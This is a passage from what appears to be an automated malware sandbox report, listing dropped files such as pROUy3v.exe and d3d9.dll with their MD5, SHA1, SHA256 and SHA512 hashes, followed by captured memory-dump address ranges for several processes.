| SHA512 | cfb6c5f1333187e0e807a3b2beb72cb50805fac403b900242afce017ccde5a677d7b8c6be86fb9933db64103cb78b17c57fdec4c764f14c89793a5ec3e309108 |
C:\ProgramData\Update\pROUy3v.exe
| MD5 | 61d3abff46a6bd2946925542c7d30397 |
| SHA1 | 1fed80a136e67a5b7b6846010a5853400886ee9c |
| SHA256 | b1a351ee61443b8558934dca6b2fa9efb0a6d2d18bae61ace5a761596604dbfa |
| SHA512 | e9e25995faff34da94d30394474471dba45f5993a2efd07f5fb8c15cfdf7b3efa7c89d6796c66323938a1c31b3b89bd7578bef7c4297c6a9b68811f00aa89975 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 174ca7d96de1ececd15503f679acafb5 |
| SHA1 | 2290e1be0fff941e769cdda7c4907418e983c547 |
| SHA256 | d89963e1b500b9e9d62cdaf1f835496e6999c778d8e93578be90342e5560f171 |
| SHA512 | 896f54a8931a53f518f08255da0ff9ebcf36b3ceb14585bf3183fed281ea8aa883516a90f9b3403043fc071d66ea41d0b726055c36753b8b48996654a112fb2e |
memory/4548-175-0x00007FF6141A0000-0x00007FF618502000-memory.dmp
memory/4304-220-0x0000000000500000-0x0000000000598000-memory.dmp
memory/4304-222-0x0000000000D00000-0x0000000000D06000-memory.dmp
\Users\Admin\AppData\Roaming\d3d9.dll
| MD5 | 106fe1980dbcb4fa2fe0c00b6d6fa7c2 |
| SHA1 | 5cb7eb7be8f3d1641cb458024d868363658a2955 |
| SHA256 | c0716389100b55b09f46fafef37bb7d120453df3bfb1097dcd30e14bb97c09bc |
| SHA512 | c9d48c5f5ecf83012f1cc16581b7bb283265a3808847af46195987c7b0721116fe7241185d67b5d7636080881da5f18df04e57e309ff5a133046dd87ca8d06ce |
memory/1660-235-0x0000000000400000-0x0000000000450000-memory.dmp
memory/1660-239-0x0000000005430000-0x000000000592E000-memory.dmp
memory/1660-240-0x0000000004FD0000-0x0000000005062000-memory.dmp
memory/1660-253-0x0000000004F30000-0x0000000004F3A000-memory.dmp
memory/320-258-0x000002BED0770000-0x000002BED078C000-memory.dmp
memory/320-264-0x000002BED0940000-0x000002BED09F9000-memory.dmp
memory/320-298-0x000002BED0790000-0x000002BED079A000-memory.dmp
memory/1660-303-0x0000000005F40000-0x0000000006546000-memory.dmp
memory/1660-356-0x0000000005270000-0x000000000537A000-memory.dmp
memory/1660-357-0x0000000005180000-0x0000000005192000-memory.dmp
memory/1660-358-0x00000000051E0000-0x000000000521E000-memory.dmp
memory/1660-375-0x0000000005380000-0x00000000053CB000-memory.dmp
memory/3184-396-0x0000000140000000-0x000000014000E000-memory.dmp
memory/3184-399-0x0000000140000000-0x000000014000E000-memory.dmp
memory/4748-400-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4748-403-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4748-407-0x00000201F4C90000-0x00000201F4CB0000-memory.dmp
memory/4748-404-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4748-405-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4748-406-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4748-411-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4748-412-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4748-409-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4748-408-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4748-410-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4748-402-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4748-401-0x0000000140000000-0x0000000140848000-memory.dmp
memory/3184-395-0x0000000140000000-0x000000014000E000-memory.dmp
memory/3184-394-0x0000000140000000-0x000000014000E000-memory.dmp
memory/3184-393-0x0000000140000000-0x000000014000E000-memory.dmp
memory/3184-392-0x0000000140000000-0x000000014000E000-memory.dmp
memory/4548-413-0x00007FF6141A0000-0x00007FF618502000-memory.dmp
memory/1660-414-0x00000000059F0000-0x0000000005A56000-memory.dmp
memory/4748-415-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1660-416-0x0000000006980000-0x0000000006B42000-memory.dmp
memory/1660-417-0x0000000007080000-0x00000000075AC000-memory.dmp
memory/1660-418-0x0000000006900000-0x0000000006950000-memory.dmp
memory/4548-419-0x00007FF6141A0000-0x00007FF618502000-memory.dmp
memory/4548-421-0x00007FF6141A0000-0x00007FF618502000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ff85f09f39c29eed17ea8954d5512aae |
| SHA1 | 10dee2e70802b552f752251e75bb678b91f0c172 |
| SHA256 | 47d3cba5e92ca1194a130906ab17b82e9a70670f4820be8a04cd619065a0edc6 |
| SHA512 | bdc3ec9f6cfe78112b2ef516955b8973a445fffc84215a5d0b883c98af5a5237b6fd31ad7f75bd783d2e413414e6b7be505aec0e3a4d38e2b8c0a6f1a526b3fe |
memory/4548-466-0x00007FF6141A0000-0x00007FF618502000-memory.dmp
memory/4748-469-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4748-470-0x0000000140000000-0x0000000140848000-memory.dmp